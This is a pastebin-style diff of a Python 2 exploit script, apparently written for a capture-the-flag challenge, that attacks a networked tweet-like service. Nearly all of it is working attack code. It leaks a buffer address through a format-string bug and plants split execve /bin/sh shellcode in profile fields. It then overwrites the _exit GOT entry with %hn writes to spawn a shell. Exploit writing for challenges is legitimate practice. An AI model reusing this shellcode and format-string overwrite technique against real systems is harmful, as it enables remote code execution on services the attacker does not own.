SHOW:
|
|
- or go back to the newest paste.
| 1 | # -*- coding: utf-8 -*- | |
| 2 | import socket | |
| 3 | import struct | |
| 4 | ||
| 5 | target_ip = "serv" | |
| 6 | target_port = 12345 | |
| 7 | ||
| 8 | ''' | |
| 9 | len of first part of the shellcode should be < 20 | |
| 10 | we use \xeb\x01 (jmp+1) to join the two parts | |
| 11 | of the shellcode | |
| 12 | ||
| 13 | for this chall a bind shellcode is more appropriate than | |
| 14 | a /bin/sh | |
| 15 | ||
| 16 | xor %eax,%eax | |
| 17 | push %eax | |
| 18 | push $0x68732f2f | |
| 19 | push $0x6e69622f | |
| 20 | mov %esp,%ebx | |
| 21 | push %eax | |
| 22 | push %ebx | |
| 23 | mov %esp,%ecx | |
| 24 | mov $0xb,%al | |
| 25 | int $0x80 | |
| 26 | char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" | |
| 27 | "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; | |
| 28 | ''' | |
| 29 | ||
| 30 | sc1 = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xeb\x01" | |
| 31 | sc2 = "\x89\xe1\xb0\x0b\xcd\x80" | |
| 32 | ||
| 33 | sc_status = "AAAA" + "\n" | |
| 34 | ||
| 35 | sk = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) | |
| 36 | sk.connect((target_ip, target_port)) | |
| 37 | ||
| 38 | # welcome | |
| 39 | print sk.recv(4096) | |
| 40 | ||
| 41 | # send nick | |
| 42 | nick = "jojo\n" | |
| 43 | sk.send(nick) | |
| 44 | print sk.recv(4096) | |
| 45 | ||
| 46 | # retrieve buffer addr : | |
| 47 | tweet = "\x32"+"\n" | |
| 48 | sk.send(tweet) | |
| 49 | print sk.recv(4096) | |
| 50 | ||
| 51 | # mem leak | |
| 52 | mem_leak = "%08x\n" | |
| 53 | sk.send(mem_leak) | |
| 54 | data = sk.recv(4096) | |
| 55 | ||
| 56 | addr_pos = data.find("\x0a\x0a\x0a")
| |
| 57 | ||
| 58 | addr_buf_str = data[addr_pos+3:addr_pos+3+8].decode("hex")
| |
| 59 | ||
| 60 | addr_buff = struct.unpack(">I", addr_buf_str)[0]
| |
| 61 | print "buffer_addr = " + hex(addr_buff) | |
| 62 | ||
| 63 | # we put our shellcode divided in two parts | |
| 64 | # edit profile | |
| 65 | cmd = "\x31"+"\n" | |
| 66 | sk.send(cmd) | |
| 67 | print sk.recv(4096) | |
| 68 | ||
| 69 | # send nick sc | |
| 70 | sk.send(sc1) | |
| 71 | print sk.recv(4096) | |
| 72 | ||
| 73 | # send website sc | |
| 74 | sk.send(sc2) | |
| 75 | print sk.recv(4096) | |
| 76 | ||
| 77 | # send status sc | |
| 78 | sk.send(sc_status) | |
| 79 | print sk.recv(4096) | |
| 80 | ||
| 81 | tweet = "\x32"+"\n" | |
| 82 | sk.send(tweet) | |
| 83 | print sk.recv(4096) | |
| 84 | ||
| 85 | tweet = "\x32"+"\n" | |
| 86 | sk.send(tweet) | |
| 87 | print sk.recv(4096) | |
| 88 | ||
| 89 | addr_high = addr_buff >> 16 | |
| 90 | addr_low = addr_buff & 0xFFFF | |
| 91 | ||
| 92 | print "addr_high = " + hex(addr_high) | |
| 93 | print "addr_low = " + hex(addr_low) | |
| 94 | ||
| 95 | # send fmt_string | |
| 96 | # use twice printf format string | |
| 97 | # HIGH(@_exit) = 0x8049bfe | |
| 98 | # LOW(@_exit) = 0x8049bfc | |
| 99 | # rewrite _exit with addr_buff | |
| 100 | fmt_string = "aa" + struct.pack("<I", 0x8049bfc) + "%" + str(addr_low-6) + "c%5$hn\n"
| |
| 101 | sk.send(fmt_string) | |
| 102 | print sk.recv(4096) | |
| 103 | print data | |
| 104 | tweet = "\x32"+"\n" | |
| 105 | sk.send(tweet) | |
| 106 | print sk.recv(4096) | |
| 107 | fmt_string = "aa" + struct.pack("<I", 0x8049bfe) + "%" + str(addr_high-6) + "c%5$hn\n"
| |
| 108 | sk.send(fmt_string) | |
| 109 | print sk.recv(4096) | |
| 110 | ||
| 111 | print "launch shellcode -> call _exit" | |
| 112 | ||
| 113 | - | raw_input("wait")
|
| 113 | + | |
| 114 | sk.send(tweet) | |
| 115 | print sk.recv(4096) | |
| 116 | ||
| 117 | sk.close() |
